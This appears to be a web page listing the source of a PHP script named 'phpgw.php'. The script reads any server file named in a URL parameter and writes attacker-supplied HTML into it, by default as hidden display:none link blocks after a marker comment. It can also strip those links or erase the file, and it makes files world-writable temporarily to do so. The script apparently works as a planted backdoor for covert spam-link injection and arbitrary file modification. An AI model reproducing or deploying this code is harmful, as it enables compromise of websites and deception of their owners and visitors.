phpgw.php
2008-04-01
<html>
<head><title>phpgw.php</title>
</head>
<body>
<?php// <TEST> // $_GET['s'] = '/home/jed/test/test.html'; // $_POST['m'] = '<p style="display: none">blaha-bla</p>'; // </TEST>
set_time_limit(36000); $marker = '<!-- b2756e9ee842177c1af26faa1881031e -->'; function unslash_rec(&$arr) { reset($arr); while (list($key)=each($arr)) { if (is_array($arr[$key])) unslash_rec($arr[$key]); else { $arr[$key]=stripslashes($arr[$key]); }; }; };
function unslash_gpc() { if (get_magic_quotes_gpc()) { unslash_rec($_POST); }; };
$links = Array(); $elinks = Array();
function quote_link($lnk) { return preg_quote($lnk, '/'); };
function process_block($block) { GLOBAL $elinks; $txt = $block[0]; foreach ($elinks as $elink) { $pattern = "/<a href=\"{$elink}[^\"]*\">.+?<\/a>[^<]*/"; print "PATTERN: [$pattern]<br/>\n"; $txt = preg_replace($pattern, '', $txt); }; return $txt; };
if (array_key_exists('f', $_GET)) { unslash_gpc(); //header('Content-Type: text/plain'); if (false === ($txt = file_get_contents($_GET['f']))) die("ERROR: 1 Failed to get file contents: {$_GET['f']}<br/>\n"); if (array_key_exists('m', $_POST)) { // Adding $add_html = false; $add_body = false; $add_marker = false; if (!$_POST['a']) { $substr = stristr($txt, $marker); if (!$substr) { $add_marker = true; $substr = stristr($txt, '</body'); if (false === $substr) { print "</BODY not found!!!";// DEBUG $add_body = true; $substr = stristr($txt, '</html'); if (false === $substr) { print "</HTML not found!!!";// DEBUG $add_html = true; $substr = $txt; // die("ERROR: 6 Failed to find </body> tag <br/>\n"); }; }; $pos = strlen($txt) - strlen($substr); } else { $pos = strlen($txt) - strlen($substr) + strlen($marker); }; $tail = substr($txt, $pos); $txt = substr($txt, 0, $pos); if ($add_marker) $txt .= ' ' .$marker . ' '; $txt .= ' ' . $_POST['m'] . ' '; if ($add_body) $txt .= '</body>'; if ($add_html) $txt .= '</html>'; $txt .= $tail; } else { $txt = $_POST['m'] . ' ' . $txt; }; } else if (array_key_exists('u', $_POST) || array_key_exists('e', $_POST)) { // Removing if ($_REQUEST['e'] == 'erase') { // FULL ERASE if ($_REQUEST['a']) { // WRITING TO .TPL, JUST MAKING FILE EMPTY $txt = ''; } else { // WRITING TO HTML, SHOULD OBEY </BODY></HTML> TAGS if (($pos = strpos($txt, $marker))) { $txt = substr($txt, 0, $pos + strlen($marker)) . " \n</body></html>"; }; }; } else { // CUSTOMIZED ERASE //header('Content-type: text/plain'); print "INPUT: [{$_POST['u']}] <br/>\n"; $links = explode("\n", $_POST['u']); $links = array_map('trim', $links); $links = preg_grep('/[^\s\r\n\t]/', $links); print_r($links); $elinks = array_map('quote_link', $links); $pattern = '/<p style="display: none">.*?<\/p>/s'; $txt = preg_replace_callback($pattern, 'process_block', $txt); $pattern = "/<p style=\"display: none\">[\s\r\n]*<\/p>/"; $txt = preg_replace($pattern, '', $txt); }; }; $stat = @stat($_GET['f']); // if ($stat['mode'] & 0777 != 0644) // { // // }; if ($stat['mode']) @chmod($_GET['f'], 0666); $hf = fopen($_GET['f'], "w"); if (!$hf) { @chmod($_GET['f'], $stat['mode'] & 0777); die('ERROR: 2 Failed to open file for writing<br>\n'); }; fwrite($hf, $txt); fclose($hf); if ($stat['mode']) @chmod($_GET['f'], $stat['mode'] & 0777); print "OK: 0 ALL OPERATIONS SUCCEEDED<br/>\n"; } else { /* print <<<EOM <form action="up.php" method="POST"> <input type="text" name="s" style="width: 400px;" value=""/><br/> <textarea name="u" style="width: 400px; height: 200px "></textarea><br/> <input type="submit" value="Submit"> </form> EOM; */ print "ERROR: 7 UNKNOWN<br/>\n"; }; ?> </body> </html>
Copyright © 2005-2008 厦门新软电脑科技有限公司 [闽ICP备05035280号]
